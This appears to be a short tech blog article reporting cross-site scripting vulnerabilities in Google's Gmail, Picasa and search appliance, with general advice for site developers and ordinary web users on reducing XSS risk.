It's a commonplace that online security threats are aimed at the biggest target available. In terms of operating systems, it's still Microsoft. But if you consider how people use the Internet, think G - G for Google, that is.
According to theRegister.co.uk website (motto "biting the hand that feeds IT"), Google's Gmail web-based email, Picasa picture organizer, and embedded search appliance (used in websites that incorporate Google Search) have recently been proven to be vulnerable to exploits using cross site scripting (XSS).
Web Info Pirates Fly the XSS Flag
What XSS Can Do to You
In the case of the most recent Google XSS problems, XSS vulnerabilities could be used to steal cookies, steal photos from Picasa, contacts from a Gmail account, and redirected Gmail messages to a specified account. Although Google's taken action to block these attacks, this is just the latest round in XSS-based vulnerabilities suffered by Google - and others. For example, the Samy (aka J.S. Spacehero) virus used XSS to infect over a million MySpace users' pages in 2005, and a May 2007 ranking of websites with XSS vulnerabilities (available from this page) lists many major websites, including Flickr, Photobucket, Yahoo! and many others.
Stopping XSS - If You Can
The ultimate solution to XSS vulnerabilities would be to disable all scripts - unfortunately, in today's Internet, such a move would also disable most commercial websites. Boring! So, what else can you do?
If you develop websites for fun or profit, consider scanning them for XSS vulnerabilities, using a tool such as the Web Vulnerability Scanner from Acunetix Ltd (a free version is available) or others. This Google search (ironic, isn't it?) will find more examples.
But, if you're an ordinary web user, not a developer,what are your options (other than disabling scripting, that is)?
1. If you use browser add-ons or updates to other types of web-enabled products, make sure you install updates as soon as they're available. As with updates for Windows, browser add-on updates are often provided to improve security.
2. Keep in mind that any web-based service can be vulnerable to XSS.
3. XSS vulnerabilities are often cross-browser threats; using Firefox or Opera might not protect you.
4. Most XSS exploits also depend upon old favorites like spoofing or clicking links. As always, think before you click.